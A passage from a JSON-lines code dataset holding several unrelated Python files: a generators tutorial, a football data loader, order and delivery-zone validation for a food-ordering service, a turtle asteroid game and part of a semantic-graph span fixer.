newton(k, stepsRight) % int(1e9+7)\n return comb(k, stepsRight) % int(1e9+7)\n","repo_name":"balwierz/LeetCode","sub_path":"2400 number of ways to reach a position after exactly k steps.py","file_name":"2400 number of ways to reach a position after exactly k steps.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23116093957","text":"def my_generator():\n yield 1\n yield 2\n yield 3\n\ng = my_generator()\n\nval = next(g)\nprint(val) #1\nval = next(g)\nprint(val) #2\n#val = next(g)\n#print(val) #3\n#val = next(g)\n#print(val) #Stop itteration\n\nprint(sum(g)) #3 bcs rest was used\n\ndef generetor1(num):\n print(\"start\")\n while num > 0:\n yield num\n num -= 1\n\ng = generetor1(4) # wont print anything !!\n\nval = next(g) #print \"start\"\nprint(val) #print 4\n\nval = next(g) # DONT print \"start\" !!\nprint(val) #print 3\n\ndef firstn_generator(n):\n num = 0\n while num < n:\n yield num\n num += 1\n\nprint(sum(firstn_generator(10))) #45, save memory\n\ndef fib(limit):\n a, b = 0, 1\n while a < limit:\n yield a\n a, b = b, a + b\n\nf = fib(30)\nfor i in f:\n print(i) #print fibonacci nums smaller than 30\n\n\n#in () generetors !!\ngeneretor = (i for i in range(10) if i %2 == 0)\n# in [] list!!\nl = [i for i in range(10) if i %2 == 0]","repo_name":"lukmanis25/AdvancedPythonCourse","sub_path":"Generators.py","file_name":"Generators.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29035665010","text":"from data_tools import load_games\r\n\r\n## ---------------------------- Info about load_games ----------------------------\r\n##\r\n## The function outputs a list of \"game_match\" objects, which represents\r\n## a single match. 
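Both top-K solutions above build the frequency map by hand; collections.Counter folds the counting and the heap selection together, since most_common(k) uses heapq.nlargest internally and keeps the O(n log k) bound:

from collections import Counter

def top_k_frequent(nums, k):
    return [num for num, _ in Counter(nums).most_common(k)]

assert sorted(top_k_frequent([1, 1, 1, 2, 2, 3], 2)) == [1, 2]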
It has the following attributes:\r\n## league -> just a remainder that its the correct league\r\n##\r\n## season -> the starting year for that season (2012-2013 would be 2012)\r\n##\r\n## date -> the date when that match took place (DD/MM/YY)\r\n##\r\n## home_team -> name of the home team (!! Important to note that most names\r\n## away_team -> name of the away team are slightly changed, because the \r\n## author of those csv files decided\r\n## to do that. For example, \r\n## Manchester United is Man United\r\n## Tottenham Hotspur F.C. is Tottenham !!)\r\n##\r\n## features -> A dictioary with data from the csv files, where each key is\r\n## an entry from the ENTRIES list (except Date, HomeTeam, AwayTeam)\r\n## (!! it doesnt happen often but there might be about 10-20 games\r\n## out of 26k that dont have some of those entries, meaning \r\n## HTAG might have a value of \"\" !!)\r\n##\r\n## ------------ misc stuff ------------\r\n##\r\n## It also stores the games the home team had played against the away team and any\r\n## team this season, the previous season and the season before that. Note that\r\n## a lot of teams might have been demoted from the top leagues so its probable that\r\n## they dont have past info.\r\n## In addition, it also stores the previous season standings\r\n\r\n\r\n## Defines the data entires that will loaded from the csv files\r\n## # 0) season (starting year) or div if from a csv reader\r\nENTRIES = [\"Date\", # 1) date at which it was played\r\n \"HomeTeam\", # 2) home team\r\n \"AwayTeam\", # 3) away team\r\n \"FTHG\", # 4) full time home goals\r\n \"FTAG\", # 5) full time away goals\r\n \"FTR\", # 6) full time result (H, D, A)\r\n \"HTHG\", # 7) half time home goals\r\n \"HTAG\", # 8) half time away goals\r\n \"HTR\", # 9) half time result (H, D, A)\r\n \"HS\", # 10) home shots\r\n \"AS\", # 11) away shots\r\n \"HST\", # 12) home team shots on target\r\n \"AST\", # 13) away team shots on target\r\n \"HF\", # 14) home team fouls\r\n \"AF\", # 15) away team fouls\r\n \"HC\", # 16) home team corners\r\n \"AC\", # 17) away team corners\r\n \"HY\", # 18) home yellow cards\r\n \"AY\", # 19) away yellow cards\r\n \"HR\", # 20) home red cards\r\n \"AR\" # 21) away red cards\r\n ]\r\n\r\n## Properly functioning csv files given these entries\r\n## England --> 2000-2021\r\n## Germany --> 2006-2021\r\n## Italy --> 2005-2021\r\n## Spain --> 2005-2021\r\nLOWER_BOUND = {'England': 2000,\r\n 'Germany': 2006,\r\n 'Italy' : 2005,\r\n 'Spain' : 2005}\r\n\r\n\r\n\r\ndef main():\r\n ## Sample usage\r\n # loads all available premier league games\r\n GAMES = load_games(\"England\", (2000, 2021))\r\n \r\n game = GAMES[123]\r\n # match identifiers\r\n print(f\"\\nSeason {game.season}/{int(game.season) + 1} | {game.date}\")\r\n print(f\"{game.home_team} vs {game.away_team}\\n\")\r\n \r\n # one match features\r\n print(\"### Features ###\")\r\n features = game.features\r\n for feat in features:\r\n print(f\"{feat} -> {features[feat]}\")\r\n\r\n ## If you want to load only one season then\r\n # 1. if only features are needed\r\n GAMES = load_games(\"England\", (2012, 2012))\r\n \r\n # 2. 
if also the past games are needed then load two year before that\r\n # and ignore the first two seasons from the output list.\r\n # for germany [306*2:] since they have 306 games instead of 380 in one season\r\n GAMES = load_games(\"England\", (2012 - 2, 2012))[380*2:]\r\n print(len(GAMES))\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"claudia-viaro/Wdss-UCLdss_research","sub_path":"(1)Bayesian methods in sport statistics/data_processor_1_0.py","file_name":"data_processor_1_0.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"17238836789","text":"# coding=utf-8\nfrom datetime import datetime, timedelta\nimport logging\nimport time\n\nfrom google.appengine.api import memcache\n\nfrom google.appengine.ext.ndb import GeoPt\n\nfrom models.config.config import config\nfrom methods import location\nfrom methods.geocoder import get_houses_by_address, get_areas_by_coordinates, get_streets_or_houses_by_address\nfrom methods.orders.validation.validation import get_first_error\nfrom methods.rendering import latinize, get_phone, get_separated_name_surname, \\\n parse_time_picker_value, get_device_type\nfrom models import Order, Client, Venue, STATUS_AVAILABLE, DeliverySlot, DeliveryZone, STATUS_UNAVAILABLE\nfrom models.order import NOT_CANCELED_STATUSES\nfrom models.venue import DELIVERY\n\n__author__ = 'dvpermyakov'\n\n\ndef get_order_id(order_json):\n def _cache_key(order_id):\n return \"order_%s\" % order_id\n\n def _check(order_id, cache_key):\n if Order.get_by_id(order_id) or not memcache.add(cache_key, 1):\n logging.warning(\"order_id check: %s is in use\", order_id)\n return False\n return True\n\n order_id = order_json.get('order_id')\n if order_id:\n logging.debug(\"order_id check: got %s from json\", order_id)\n order_id = int(order_id)\n cache_key = _cache_key(order_id)\n return order_id, cache_key if _check(order_id, cache_key) else None, None\n else:\n for _ in xrange(3):\n order_id = Order.generate_id()\n cache_key = _cache_key(order_id)\n logging.debug(\"order_id check: generated %s\", order_id)\n if _check(order_id, cache_key):\n return order_id, cache_key\n time.sleep(0.05) # sleep 50ms for fastcounter\n return None, None\n\n\ndef set_extra_order_info(order, extra_info, num_people, cash_change):\n extra_json = {}\n if config.ORDER_MODULE and config.ORDER_MODULE.status == STATUS_AVAILABLE:\n for field in config.ORDER_MODULE.extra_fields:\n group_key = latinize(field.group_title)\n field_key = latinize(field.title)\n group_dict = extra_info.get(group_key)\n value = group_dict.get(field_key) if group_dict else None\n extra_json[field_key] = value\n if config.ORDER_MODULE.enable_number_of_people:\n extra_json['num_people'] = num_people\n if config.ORDER_MODULE.enable_change:\n extra_json['cash_change'] = cash_change\n order.extra_data = extra_json\n\n\ndef check_items_and_gifts(order_json):\n if not order_json['items'] and not order_json.get('gifts') and not order_json.get('order_gifts'):\n return False\n else:\n return True\n\n\ndef set_client_info(client_json, headers):\n client_id = int(client_json.get('id', 0)) or int(headers.get('Client-Id') or 0)\n if not client_id:\n return None\n client = Client.get(client_id)\n if not client:\n return None\n name, surname = get_separated_name_surname(client_json.get('name'))\n client.name = name\n client.surname = surname\n client.tel = get_phone(client_json.get('phone'))\n client.email = client_json.get('email')\n 
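The usage notes in the data loader record above slice off 380*2 games to keep one Premier League season plus two seasons of history. A small helper that derives the slice from the league; only the England (380) and Germany (306) per-season counts come from the record, the Italy and Spain values are assumptions:

from data_tools import load_games

GAMES_PER_SEASON = {"England": 380, "Germany": 306, "Italy": 380, "Spain": 380}

def load_season_with_history(league, season, history=2):
    # Load `season` plus `history` earlier seasons, return only `season`.
    games = load_games(league, (season - history, season))
    return games[GAMES_PER_SEASON[league] * history:]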
client.user_agent = headers['User-Agent']\n if not client.device_type:\n client.device_type = get_device_type(client.user_agent)\n client.version = headers.get('Version', 0)\n extra_json = {}\n groups = client_json.get('groups') or {}\n if config.CLIENT_MODULE and config.CLIENT_MODULE.status == STATUS_AVAILABLE:\n for field in config.CLIENT_MODULE.extra_fields:\n group_key = latinize(field.group_title)\n field_key = latinize(field.title)\n group_dict = groups.get(group_key)\n value = group_dict.get(field_key) if group_dict else None\n extra_json[field_key] = value\n client.extra_data = extra_json\n client.put()\n return client\n\n\ndef validate_address(address):\n logging.info('initial address = %s' % address)\n\n # case of street and home are separated by comma\n if ',' in address['address']['street']:\n address['address']['home'] = address['address']['street'].split(',')[1]\n address['address']['street'] = address['address']['street'].split(',')[0]\n\n # trim blank spaces\n address['address']['city'] = address['address']['city'].strip()\n address['address']['street'] = address['address']['street'].strip().capitalize()\n address['address']['home'] = address['address']['home'].strip()\n if address['address'].get('flat'):\n address['address']['flat'] = address['address']['flat'].strip()\n\n # not trust\n address['coordinates']['lat'] = None\n address['coordinates']['lon'] = None\n\n # try to get coordinates\n candidates = get_houses_by_address(address['address']['city'], address['address']['street'],\n address['address']['home'])\n for candidate in candidates:\n if candidate['address']['city'].lower() == address['address']['city'].lower():\n if candidate['address']['street'].lower() == address['address']['street'].lower():\n if candidate['address']['home'].lower() == address['address']['home'].lower():\n address['coordinates']['lat'] = candidate['coordinates']['lat']\n address['coordinates']['lon'] = candidate['coordinates']['lon']\n if address['coordinates']['lat'] and address['coordinates']['lon']:\n break\n\n\n # if yandex maps did not find required address in the query, but there is suggested address\n # with same street, assign its coordinates to our address\n if not address['coordinates']['lat'] or not address['coordinates']['lon']:\n if len(candidates) > 0:\n if candidates[0]['address']['street'].lower() == address['address']['street'].lower():\n address['coordinates']['lat'] = candidates[0]['coordinates']['lat']\n address['coordinates']['lon'] = candidates[0]['coordinates']['lon']\n # if any house was found, method checks if there are such streets\n else:\n candidates = get_streets_or_houses_by_address(address['address']['city'], address['address']['street'])\n if len(candidates) > 0:\n if candidates[0]['address']['street'].lower() == address['address']['street'].lower():\n address['coordinates']['lat'] = candidates[0]['coordinates']['lat']\n address['coordinates']['lon'] = candidates[0]['coordinates']['lon']\n\n logging.info('result address = %s' % address)\n return address\n\n\ndef get_venue_and_zone_by_address(address):\n area = None\n venues = Venue.fetch_venues(Venue.active == True)\n if address:\n has_coords = False\n if address.get('coordinates'):\n if address['coordinates'].get('lat') and address['coordinates'].get('lon'):\n has_coords = True\n nearest_venues = [] # it is used for getting nearest venue if zone is not found\n\n ZONE_SEARCH_TYPES = (DeliveryZone.ZONE, DeliveryZone.RADIUS, DeliveryZone.NEAREST, DeliveryZone.DISTRICT,\n DeliveryZone.CITY, 
DeliveryZone.DEFAULT)\n\n        for zone_type in ZONE_SEARCH_TYPES:\n            for venue in venues:\n                delivery = venue.get_delivery_type(DELIVERY)\n                if not delivery or delivery.status == STATUS_UNAVAILABLE:\n                    continue\n\n                delivery_zones = [DeliveryZone.get(zone_key) for zone_key in delivery.delivery_zones]\n                delivery_zones = sorted([zone for zone in delivery_zones if zone.status == STATUS_AVAILABLE],\n                                        key=lambda zone: zone.sequence_number)\n\n                current_zones = [zone for zone in delivery_zones if zone.search_type == zone_type]\n                for zone in sorted(current_zones, key=lambda zone: zone.sequence_number):\n\n                    # case 1: get venue by custom zone\n                    if zone.search_type == DeliveryZone.ZONE:\n                        if has_coords and zone.is_included(address):\n                            zone.found = True\n                            return venue, zone\n                    # case 2: get venue by radius\n                    elif zone.search_type == DeliveryZone.RADIUS:\n                        if has_coords:\n                            distance = location.distance(\n                                GeoPt(address['coordinates']['lat'], address['coordinates']['lon']),\n                                GeoPt(zone.address.lat, zone.address.lon))\n                            if distance <= zone.value:\n                                zone.found = True\n                                return venue, zone\n                    # case 3: add nearest venues\n                    elif zone.search_type == DeliveryZone.NEAREST:\n                        if has_coords:\n                            venue.distance = location.distance(\n                                GeoPt(address['coordinates']['lat'], address['coordinates']['lon']),\n                                venue.coordinates)\n                            venue.zone = zone\n                            nearest_venues.append(venue)\n                    # case 4: get venue by district\n                    elif zone.search_type == DeliveryZone.DISTRICT:\n                        if has_coords and zone.address.area:\n                            if not area:\n                                candidates = get_areas_by_coordinates(address['coordinates']['lat'],\n                                                                      address['coordinates']['lon'])\n                                if candidates:\n                                    area = candidates[0]['address']['area']\n                                if not area:\n                                    area = u'Not found'\n                            if zone.address.area == area:\n                                zone.found = True\n                                return venue, zone\n                    # case 5: get venue by city\n                    elif zone.search_type == DeliveryZone.CITY:\n                        if address['address']['city'] == zone.address.city:\n                            zone.found = True\n                            return venue, zone\n                    # case 6: get default venue\n                    elif zone.search_type == DeliveryZone.DEFAULT:\n                        zone.found = False\n                        return venue, zone\n\n        if nearest_venues:\n            venue = sorted(nearest_venues, key=lambda venue: venue.distance)[0]\n            venue.zone.found = True\n            return venue, venue.zone\n\n    if not address or \\\n            not address.get('coordinates') or \\\n            not address['coordinates'].get('lat') or \\\n            not address['coordinates'].get('lon') or \\\n            not area:\n\n        default_venues = [venue for venue in venues if venue.default == True]\n\n        # case 7: get first venue with default flag\n        for venue in default_venues:\n            delivery = venue.get_delivery_type(DELIVERY)\n            if not delivery or delivery.status == STATUS_UNAVAILABLE:\n                continue\n            zones = sorted([DeliveryZone.get(zone_key) for zone_key in delivery.delivery_zones],\n                           key=lambda zone: zone.sequence_number)\n            if len(zones) > 0:\n                zones[0].found = False\n                return venue, zones[0]\n\n    # case 8: if company rejects orders not in zones\n    if config.REJECT_IF_NOT_IN_ZONES:\n        return None, None\n\n    # case 9: get first venue\n    for venue in venues:\n        delivery = venue.get_delivery_type(DELIVERY)\n        if not delivery or delivery.status == STATUS_UNAVAILABLE:\n            continue\n        zones = sorted([DeliveryZone.get(zone_key) for zone_key in delivery.delivery_zones],\n                       key=lambda zone: zone.sequence_number)\n        if len(zones) > 0:\n            zones[0].found = False\n            return venue, zones[0]\n\n    return None, None\n\n\ndef get_delivery_time(delivery_time_picker, venue, delivery_slot=None, delivery_time_minutes=None):\n    logging.debug('DELIVERY_TIME_PICKER: {0}'.format(delivery_time_picker))\n    if delivery_time_picker:\n        
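# --- Illustrative sketch (not part of the source): get_venue_and_zone_by_address
# above tries zone types in a fixed priority order (custom polygon, radius,
# nearest, district, city, default) and returns on the first hit. Below is the
# radius tier alone, with a haversine distance in place of location.distance;
# the zone dicts are made up:
import math

def haversine_km(lat1, lon1, lat2, lon2):
    # great-circle distance between two (lat, lon) points, in kilometres
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))

def first_radius_zone(point, zones):
    # zones are checked in sequence_number order, as in the source;
    # `value` holds the zone radius (here in km)
    for zone in sorted(zones, key=lambda z: z['sequence_number']):
        if haversine_km(point[0], point[1], *zone['center']) <= zone['value']:
            return zone
    return None

zones = [{'sequence_number': 1, 'center': (55.75, 37.61), 'value': 5.0}]
print(first_radius_zone((55.76, 37.60), zones))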
delivery_time_picker = parse_time_picker_value(delivery_time_picker)\n if venue and (not delivery_slot or delivery_slot.slot_type == DeliverySlot.MINUTES):\n delivery_time_picker -= timedelta(hours=venue.timezone_offset)\n\n if delivery_slot:\n if delivery_slot.slot_type == DeliverySlot.MINUTES:\n delivery_time_minutes = delivery_slot.value\n delivery_time_picker = datetime.utcnow()\n elif delivery_slot.slot_type == DeliverySlot.HOURS_FROM_MIDNIGHT:\n if venue:\n tz = venue.timezone_offset\n else:\n tz = Venue.get_first_tz()\n if not delivery_time_picker:\n delivery_time_picker = datetime.now(tz=tz)\n delivery_time_picker = delivery_time_picker.replace(hour=0, minute=0, second=0, microsecond=0)\n delivery_time_picker += timedelta(hours=delivery_slot.value - tz)\n delivery_time_picker += timedelta(seconds=1) # it is need for being after specific hour in schedule\n elif delivery_slot.slot_type == DeliverySlot.STRINGS:\n if delivery_time_picker:\n delivery_time_picker = delivery_time_picker.replace(hour=0, minute=0, second=0)\n\n delivery_time = None\n if delivery_time_picker:\n delivery_time = delivery_time_picker\n if delivery_time_minutes or delivery_time_minutes == 0:\n if not delivery_time:\n delivery_time = datetime.utcnow()\n delivery_time += timedelta(minutes=delivery_time_minutes)\n return delivery_time\n\n\ndef check_after_error(order_json, client):\n MINUTES = 1\n min_ago = datetime.utcnow() - timedelta(minutes=MINUTES)\n previous_order = Order.query(Order.client_id == client.key.id(),\n Order.status.IN(NOT_CANCELED_STATUSES),\n Order.date_created >= min_ago).get()\n if not previous_order:\n return False\n group_details = Order.grouped_item_dict(previous_order.item_details)\n if len(order_json['items']) != len(group_details):\n return False\n for index, item_detail in enumerate(group_details):\n item_dict = order_json['items'][index]\n if item_dict['item_id'] != item_detail['id'] or item_dict['quantity'] != item_detail['quantity']:\n return False\n return True\n\n\ndef after_validation_check(validation_result, order):\n if not validation_result['valid']:\n logging.warning('Fail in validation')\n return False, get_first_error(validation_result)\n\n total_sum = validation_result['total_sum']\n delivery_sum = validation_result['delivery_sum']\n if order.total_sum and round(total_sum * 100) != round(order.total_sum * 100):\n return False, u\"Сумма заказа была пересчитана\"\n\n # order.total_sum is here either correct or 0\n # it can be 0 because of client-side bugs (we get it from json-object in request)\n order.total_sum = total_sum\n\n if not order.delivery_sum:\n order.delivery_sum = delivery_sum\n if order.delivery_sum and round(delivery_sum * 100) != round(order.delivery_sum * 100):\n return False, u\"Сумма доставки была пересчитана\"\n if order.wallet_payment and round(order.wallet_payment * 100) != round(\n validation_result['max_wallet_payment'] * 100):\n return False, u\"Сумма оплаты баллами была пересчитана\"\n if validation_result['unavail_order_gifts'] or validation_result['new_order_gifts']:\n return False, u\"Подарки были пересчитаны\"\n return True, None\n","repo_name":"lopatinsky/automation-gae","sub_path":"methods/orders/validation/precheck.py","file_name":"precheck.py","file_ext":"py","file_size_in_byte":15943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38072918889","text":"# -*- coding: utf-8 -*-\r\n#Hyeon Jeong Byeon\r\n\r\nimport turtle\r\nimport random\r\nimport time\r\n\r\nplayer = turtle.Turtle() 
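# --- Illustrative sketch (not part of the source): after_validation_check
# above compares monetary amounts with round(x * 100) so that float noise
# smaller than one cent never triggers a spurious "sum was recalculated"
# rejection. A short demonstration of why raw float equality would misfire:
def same_amount(a, b):
    return round(a * 100) == round(b * 100)  # compare in integer cents

a, b = 0.1 + 0.2, 0.3
print(a == b)             # False: 0.30000000000000004 != 0.3
print(same_amount(a, b))  # True: identical to the cent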
# spaceship\r\nplayer.color(\"blue\")\r\nplayer.shape(\"turtle\")\r\nplayer.penup()\r\nplayer.speed(0)\r\n\r\na1 = turtle.Turtle() # asteroid 1\r\na1.color(\"red\")\r\na1.shape(\"circle\")\r\na1.penup()\r\na1.speed(0)\r\na1.goto(random.randint(-300,300), random.randint(-300,300))\r\n\r\na2 = turtle.Turtle() # asteroid 2\r\na2.color(\"yellow\")\r\na2.shape(\"circle\")\r\na2.penup()\r\na2.speed(0)\r\na2.goto(random.randint(-300,300),random.randint(-300,300))\r\n\r\nscreen = turtle.Screen()\r\n\r\ncrasheda1 = False\r\ncrasheda2 = False\r\n\r\n\r\n### --- Functions --- ###\r\n\r\n\r\ndef turnleft():\r\n    player.left(30) # rotate 30 degrees to the left\r\n\r\ndef turnright():\r\n    player.right(30) # rotate 30 degrees to the right\r\n\r\nspeed = 2\r\n\r\ndef speedUp():\r\n    global speed\r\n    speed += 1\r\n    if speed == 5:\r\n        speed = 2\r\n\r\nscreen.onkeypress(turnleft,\"Left\")\r\nscreen.onkeypress(turnright, \"Right\")\r\nscreen.onkeypress(speedUp,\"space\")\r\nscreen.listen() # the turtle graphics window listens for keyboard input\r\n\r\ndef play():\r\n    player.forward(speed) # move forward by `speed` pixels\r\n    if crasheda1 == False:\r\n        a1.forward(2)\r\n    if crasheda2 == False:\r\n        a2.forward(2)\r\n    checkPosition()\r\n    checkCrash()\r\n    if gameOver() == False:\r\n        screen.ontimer(play,10) # call play() again after 10 ms\r\n\r\ndef checkPosition():\r\n    # adjusts positions when the asteroids or the player leave the play area\r\n    # asteroids (a1, a2) only move to the right, so only the x coordinate is checked\r\n    if a1.xcor()>500:\r\n        a1.goto(random.randint(-300,300), random.randint(-300,300))\r\n    if a2.xcor()>500:\r\n        a2.goto(random.randint(-300,300), random.randint(-300,300))\r\n    if player.xcor()<-500 or player.xcor()>500 or player.ycor()<-500 or player.ycor()>500:\r\n        player.goto(0,0)\r\n        # send the spaceship back to the origin\r\n    \r\n\r\ndef checkCrash():\r\n    global crasheda1\r\n    global crasheda2\r\n    \r\n    if player.distance(a1)<12:\r\n        a1.color(\"black\")\r\n        crasheda1 = True    \r\n    if player.distance(a2)<12:\r\n        a2.color(\"black\")\r\n        crasheda2 = True    \r\n\r\ndef gameOver():\r\n    if crasheda1 == True and crasheda2 == True:\r\n        end = time.time()\r\n        et = end - start\r\n        player.write(\"GameOver : %0.2f\"%et, False, \"center\", (\"Arial\",15, \"bold\"))\r\n        return True\r\n    else:\r\n        return False\r\n\r\n### --- Main Screen --- ###\r\n\r\n\r\n# schedule the game to start after 10 ms\r\nstart = time.time()\r\n\r\nscreen.ontimer(play, 10) # call play() after 10 ms\r\n\r\n\r\n\r\n\r\n","repo_name":"hyeonJeongByeon/Python_2nd_Homework","sub_path":"변현정_Asteroid_Game.py","file_name":"변현정_Asteroid_Game.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27483048119","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport re\n\nfrom framework.common.logger import LOGGER, open_file\nfrom framework.data_structures.union_find import UnionNode\nfrom SHRG.utils.lexicon import get_lemma_and_pos, get_wordnet\n\n\nclass EdsWrapper:\n    class Node:\n        __slots__ = [\n            'lemma', 'pos', 'carg', 'label', 'span', 'sense',\n            'outgoing_edges', 'incoming_edges',\n        ]\n\n        def __init__(self, lemma, pos, sense, carg, label, span, outgoing_edges):\n            self.lemma = lemma\n            self.pos = pos\n            self.sense = sense\n            self.carg = carg\n            self.label = label\n            self.outgoing_edges = outgoing_edges\n            self.incoming_edges = []\n            self.span = span\n\n        def __repr__(self):\n            return str(self)\n\n        def __str__(self):\n            return '{}<{}:{}>'.format(self.label, self.span[0], self.span[1])\n\n    def __init__(self, sentence, original_nodes, original_edges):\n        self.sentence = sentence\n\n        nodes = {}\n        for node, edges in zip(original_nodes, original_edges):\n            # node span\n            span = -1, -1\n            if node.lnk 
is not None:\n span = node.cfrom, node.cto\n # node properties\n nodes[node.nodeid] = self.Node(lemma=node.pred.lemma,\n pos=node.pred.pos,\n sense=node.pred.sense,\n carg=node.carg,\n label=node.pred.short_form(),\n span=span,\n outgoing_edges=edges)\n\n self.nodes = nodes # type: Dict[NodeID, 'EdsGraph.Node']\n\n for source_id in nodes: # set incoming_edges\n edges = nodes[source_id].outgoing_edges\n for elabel, target_id in edges.items():\n nodes[target_id].incoming_edges.append((elabel, source_id))\n\n\ndef _is_overlapped(span1, span2):\n return span1[0] < span2[1] and span1[1] > span2[0]\n\n\ndef _is_any_overlapped(spans):\n spans = list(spans)\n for index, span1 in enumerate(spans):\n for span2 in spans[:index]:\n if _is_overlapped(span1, span2):\n return True\n return False\n\n\ndef _span_subtract_span(span1, span2): # span1 - span2\n if span2[0] > span1[0] and span2[1] >= span1[1]:\n return span1[0], span2[0]\n if span2[1] < span1[1] and span2[0] <= span1[0]:\n return span2[1], span1[1]\n\n\ndef _merge_spans(spans):\n missing_spans = []\n last_end = -1\n for start, end in sorted(spans):\n if last_end != -1 and start > last_end:\n missing_spans.append((last_end, start))\n last_end = end\n return missing_spans\n\n\ndef _find_span_in_spans_multi(target_span, spans):\n first, end = 0, -1\n while first < len(spans):\n span = spans[first]\n if target_span[0] <= span[0] and target_span[0] >= end:\n break\n end = span[1]\n first += 1\n\n last, start = len(spans), spans[-1][1] + 1\n while last > first:\n span = spans[last - 1]\n if target_span[1] >= span[1] and target_span[1] <= start:\n break\n start = span[0]\n last -= 1\n\n return first, last\n\n\ndef _find_span_in_spans_single(target_span, spans):\n for index, span in enumerate(spans):\n if span[0] <= target_span[0] and span[1] >= target_span[1]:\n return index\n\n\ndef _get_parents_by_label(graph, node, label, return_edge_label=False):\n parents = []\n for elabel, parent_id in node.incoming_edges:\n parent = graph.nodes[parent_id]\n if parent.label == label:\n if return_edge_label:\n parents.append((elabel, parent))\n else:\n parents.append(parent)\n return parents\n\n\ndef _match_label(input_value, pattern):\n if isinstance(pattern, str):\n return input_value == pattern\n if callable(pattern):\n return pattern(input_value)\n if isinstance(pattern, (tuple, list, set)):\n return input_value in pattern\n\n return re.match(pattern, input_value)\n\n\ndef get_word_bounds(string):\n s, e = 0, len(string)\n while s < e and not string[s].isalnum():\n s += 1\n while s < e and not string[e - 1].isalnum():\n e -= 1\n return s, e\n\n\ndef get_word_bounds2(string, chars):\n s, e = 0, len(string)\n while s < e and string[s] in chars:\n s += 1\n while s < e and string[e - 1] in chars:\n e -= 1\n return s, e\n\n\nclass ConceptSpanFixer:\n def __init__(self, config_path=None):\n if config_path is None:\n config_path = os.path.join(os.path.dirname(__file__),\n 'concept_fixer_config.py')\n attrs = {}\n code = open_file(config_path, 'r').read()\n exec(compile(code, config_path, 'exec'), {'re': re}, attrs)\n for name, value in attrs.items():\n if name.isupper():\n setattr(self, name, value)\n\n def get_clusters(self, sentence, nodes):\n nodes = {nodeid: node for nodeid, node in nodes.items()\n if (node.label.startswith('_')\n or node.label in self.SPECIAL_LABELS_AS_NORMAL_NODE\n or node.carg is not None)}\n\n groups = {nodeid: UnionNode(nodeid) for nodeid in nodes}\n for nodeid, node in nodes.items():\n for other_nodeid, other_node in nodes.items():\n if 
nodeid != other_nodeid \\\n and _is_overlapped(nodes[other_nodeid].span, node.span):\n groups[nodeid].union(groups[other_nodeid])\n\n clusters = {}\n for group in groups.values():\n clusters.setdefault(group.find().value, set()).add(group.value)\n\n return list(clusters.values())\n\n def fix_stage1(self, graph):\n \"\"\"deal with nodes like pre-, mid-, re-\"\"\"\n nodes = graph.nodes\n for nodeid, node in nodes.items():\n match = re.match(self.PREFIX_REGEX, node.label)\n arg1_nodeid = node.outgoing_edges.get('ARG1')\n if match and arg1_nodeid:\n LOGGER.debug('prefix: %s', match.group(0))\n prefix = match.group(1).rstrip('-')\n\n arg1_node = nodes[arg1_nodeid]\n if arg1_node.label == 'nominalization': # skip nominalization\n arg1_node = nodes[arg1_node.outgoing_edges.get('ARG1')]\n\n # change span of arg1_node to the span without prefix\n beg = graph.sentence.lower().find(prefix, *node.span)\n if beg != -1:\n end = beg + len(prefix)\n LOGGER.debug(' `%s` <-> `%s`: %s', node.span, (beg, end), node.label)\n node.span = beg, end\n if graph.sentence[end] == '-':\n end += 1\n assert end < arg1_node.span[1]\n LOGGER.debug(' `%s` <-> `%s`: %s',\n arg1_node.span, (end, arg1_node.span[1]),\n arg1_node.label)\n arg1_node.span = end, arg1_node.span[1]\n\n def fix_stage2(self, graph):\n nodes = graph.nodes\n sentence = graph.sentence\n\n clusters = self.get_clusters(sentence, nodes)\n\n states = []\n for cluster in clusters:\n if len(cluster) > 1:\n cluster_nodes = {nodeid: nodes[nodeid] for nodeid in cluster}\n assert not self._fix_stage2(graph, cluster_nodes), cluster_nodes\n\n return states\n\n def _fix_stage2(self, graph, cluster_nodes):\n sentence = graph.sentence\n nodes = graph.nodes\n\n covered_spans = {}\n for nodeid, node in list(cluster_nodes.items()):\n is_number = _match_label(node.label, self.IS_NUMBER)\n is_name = node.carg is not None or _match_label(node.label, self.IS_NAMED)\n is_much = _match_label(node.label, self.IS_MUCH)\n is_comp = _match_label(node.label, self.IS_COMP)\n is_neg = _match_label(node.label, self.IS_NEG)\n\n if not (is_number or is_name or is_much or is_comp or is_neg\n or node.label.startswith('_')):\n continue\n\n matched_tokens, sep = \\\n self._get_matched_tokens(node, sentence, nodes,\n is_number, is_name, is_much, is_comp, is_neg)\n\n if not matched_tokens:\n continue\n\n matched_tokens = [(span, word)\n for span, word in matched_tokens\n if span not in covered_spans]\n\n if len(matched_tokens) > 1 \\\n and all(word == matched_tokens[0][1] for _, word in matched_tokens):\n matched_tokens = matched_tokens[:1] # select first one\n\n if len(matched_tokens) == 1:\n span = matched_tokens[0][0]\n for other_span in covered_spans:\n if _is_overlapped(other_span, span):\n __import__(\"pdb\").set_trace()\n assert not _is_overlapped(other_span, span)\n covered_spans[span] = nodeid, node\n node.span = span\n\n if len(cluster_nodes) != len(covered_spans):\n solved_nodeids = {nodeid for nodeid, _ in covered_spans.values()}\n unsolved_nodes = [node for nodeid, node in cluster_nodes.items()\n if nodeid not in solved_nodeids]\n unsolved_labels = {node.label for node in unsolved_nodes}\n if unsolved_labels in self.IGNORE_LABEL_SETS:\n return\n\n if not _is_any_overlapped(node.span for node in cluster_nodes.values()):\n # all nodes in cluster are disconnected\n return\n\n missing_spans = _merge_spans(covered_spans)\n if not self._fix_stage2_special(sentence, solved_nodeids, unsolved_nodes,\n missing_spans, covered_spans):\n return cluster_nodes, 